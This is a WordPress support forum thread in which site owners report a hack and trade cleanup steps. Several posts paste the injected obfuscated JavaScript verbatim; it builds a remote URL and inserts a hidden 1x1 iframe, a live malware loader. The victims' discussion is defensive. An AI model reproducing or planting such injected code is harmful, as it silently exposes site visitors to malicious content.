Forums

WordPress › Support » How-To and Troubleshooting

header already sent index.php error (23 posts)

  1. sbrn178
    Member
    Posted 9 months ago #

    I got a header already sent error for index.php. I followed what was recommended in clearing all of the spaces. However, now the following is appearing on my blog and dashboard.

    mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);<?php

    I would really appreciate any help to get this fixed.

  2. itbiz2001
    Member
    Posted 9 months ago #

    Hi,
    Yes I am also seeing the same error on my wordpress site
    The website is http://www.bruny-island-accommodation.com

    The error is : "mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);"

    I have not made any changes to the site... Does anybody have any clues on why this is occuring and how to fix it ?
    Regards
    Steve

  3. teknics
    Member
    Posted 9 months ago #

    Looks like this was some kind of hack to me.

    I am seeing this too, won't load in safari but loads on my iPhone. I can get as far as the admin page but it won't load further.

    I haven't had the chance to update because my database needed updating (wordpress needed a higher mysql install than I had) - not sure when this occurred because I've not updated my site in a few days.

  4. gridg
    Member
    Posted 9 months ago #

    All of our wordpress websites are experiencing this error in the headers of the index page. Worst of all, we can't login to our wp-admin dashboard.

    Errors look like this:

    mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);

    Anyone have any ideas what this is?

  5. kmessinger
    Member
    Posted 9 months ago #

    @itbiz2001 Your site looks fine. Where is the error showing up?

    Others please post URL's.

  6. Joliepinkyswear1
    Member
    Posted 9 months ago #

    We've got it on our site too. I can log into the dashboard but I'm noticing the same code is showing up in the top of my Stats box in the dashboard and on the Dash/ Stats pages but not on any of the other code pages. The only thing new that I see on my dashboard is that there is a newer version of Genesis that I can upgrade to.
    Anyone have any ideas yet?

    http://ericshefferstevens.com

  7. itbiz2001
    Member
    Posted 9 months ago #

    Hi,
    Thanks kmessinger for the reply.
    I have fixed the site .. Another one of my sites which I have not fixed yet is http://www.avonbyskye.hstores.com , it shows the same error message in the headers.

    Thanks in advance.
    Regards
    Steve

  8. gridg
    Member
    Posted 9 months ago #


  9. gridg
    Member
    Posted 9 months ago #

    @itbiz2001 - how did you fix your site?

  10. itbiz2001
    Member
    Posted 9 months ago #

    Using FTP I did the following :

    1. Made a backup of all files on my hard drive

    2. Edited all index.php files and removed all the hacked code (the first couple of lines).

    3. Uploaded and overwrote the files(not the folders) in the wp-admin folder( This enabled me to get access back to the wp-admin login screen)

    4. Deleted the index.php files in the wp-content and wp-content/themes folders

    Hope this helps
    cheers
    steve

    PS When the issue is resolved - Make sure you update the wordpress versions on all your blogs

  11. joshvariedce
    Member
    Posted 9 months ago #

    Suffering from this as of today as well. Starting to get sorta freaked out. I backed up the files, edited the main "index.php" file (which is so far the only file I've seen to feature the crazy code starting with "mv='uf'"), re-uploaded the wp-admin files (as well as wp-includes and the main folder)... and so far I've either ran into the same error or something new. Also, now my site is popping up as an "attack site!"

  12. itbiz2001
    Member
    Posted 9 months ago #

    Double check all index files for the "mv='uf'" code.
    Check in the wp-content/cache folders for any .html files that my also have the code in it.
    That attack site message is your browser or intenet security software alert.

    As a last resort, a quick fix solution could include getting a freelancer to fix the problem for approx $30 on one of the popular freelance sites?

    Good luck.. my site is still all good.

  13. joshvariedce
    Member
    Posted 9 months ago #

    Specifically, what index files are you talking about? Other than the /index.php file.

    And I've received an e-mail from google basically telling me that the site is now blacklisted.

    As that last resort, would you happen to have a freelancer that you would recommend? I really don't want to go that route, but if I absolutely have no other choice...

  14. itbiz2001
    Member
    Posted 9 months ago #

    What is the url of your site?

  15. sbrn178
    Member
    Posted 9 months ago #

    It was some type of hack. Luckily I was able to get it fixed. I contacted my hosting company and someone from their security department helped me out. I did not know that so many people were experiencing the same issue. It definitely gave me a scare.

    http://afemalesperspective.com/

  16. joshvariedce
    Member
    Posted 9 months ago #

    @itbiz http://www.variedcelluloid.net

    Right now whatever this is (a virus? hack?) has my CSS all messed up, so things look a bit "funny".

  17. kmessinger
    Member
    Posted 9 months ago #

    @joshvariedce
    Your site looks ok in IE9 but has a lot of errors, http://validator.w3.org/check?verbose=1&uri=http%3a%2f%2fwww.variedcelluloid.net%2f

  18. joshvariedce
    Member
    Posted 9 months ago #

    @kmessinger
    I deleted the code from the front index.php page and ever since the website has been showing up... awkwardly. The "featured content gallery" plugin that I use on the front page no longer shows in a carousel, but instead posts all of the images/text/thumbnails separately in a vertical line. Also, when google emailed me about the site now being an "attack site", I checked my website stats through them and it listed the "mv=" script coming from a .js file in the "featured content gallery" plugin. I checked the .js file and found no trace of the code. I deleted it. Heck, I deleted all of my plugins earlier, and it made no real difference other than throwing me a series of new errors. I've re-uploaded those plugins now in order to actually manage some kind of troubleshooting.

    If you want to see the "mv=" error/script/whatever in action, browse around the site. It doesn't appear on the main index page, but it seems to show up everywhere else. Including my wp-admin, which I am not able to log into. Here's an example:

    http://www.variedcelluloid.net/archives/evidence-trailer-and-poster-art

    Here's a hypothetical: would it be wise to use phpmyadmin to search out all instances of the "mv=" script in the database, if there are any, and delete them? I backed up my database last night. I get the feeling that this probably isn't a DB issue, but I'm not so sure. If it is, I'd hate to do an entirely fresh install of wordpress only to find out I still have this issue.

  19. kmessinger
    Member
    Posted 9 months ago #

    See:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Here's a hypothetical: would it be wise to use phpmyadmin to search out all instances of the "mv=" script in the database, if there are any, and delete them? I backed up my database last night

    Good idea.

    And contact your host. Odds are you are not the only one this has happened to.

  20. joshvariedce
    Member
    Posted 9 months ago #

    Note: just checked the front page of the site on a different computer, and it looks "okay". However, the wp-admin and every other page on the site still just loads up nothing.

    Thanks for the links, I'll go through them later. Right now I'm looking at doing the phpmyadmin trick and then doing a completely fresh install of wordpress. Suuuuuccckss. I'll post results.

    As far as contacting my host goes... I'm on godaddy. If I shoot them an e-mail today, I should hopefully get a non-helpful response sometime in the first quarter of next year, lol

  21. Joliepinkyswear1
    Member
    Posted 9 months ago #

    Using FTP I did the following :

    1. Made a backup of all files on my hard drive

    2. Edited all index.php files and removed all the hacked code (the first couple of lines).

    3. Uploaded and overwrote the files(not the folders) in the wp-admin folder( This enabled me to get access back to the wp-admin login screen)

    4. Deleted the index.php files in the wp-content and wp-content/themes folders

    Hope this helps
    cheers
    steve

    PS When the issue is resolved - Make sure you update the wordpress versions on all your blogs

    @itbiz2001 We followed your directions and it seems to be gone...Thank you so much

    http://ericshefferstevens.com

  22. itbiz2001
    Member
    Posted 9 months ago #

    Your welcome :)

  23. teknics
    Member
    Posted 9 months ago #

    Got my install all straightened out.

    Unfortunately for me, I needed to update my database first from MYSQL 4 to MYSQL5 in order to update WordPress first. Not really something I wanted to do today - lol

    This hack originated through an old plugin that was no longer updated - for me it was KB Advanced RSS.

    Make sure you either update, or re-upload several index.php file that are affected. If you can, go through FTP and check to see which files were updated by date to figure out what went wrong. I'd also do the same thing for plugins and delete them in order to log back into the admin panel.

    Best of luck to everyone else!

Reply

You must log in to post.

About this Topic

Tags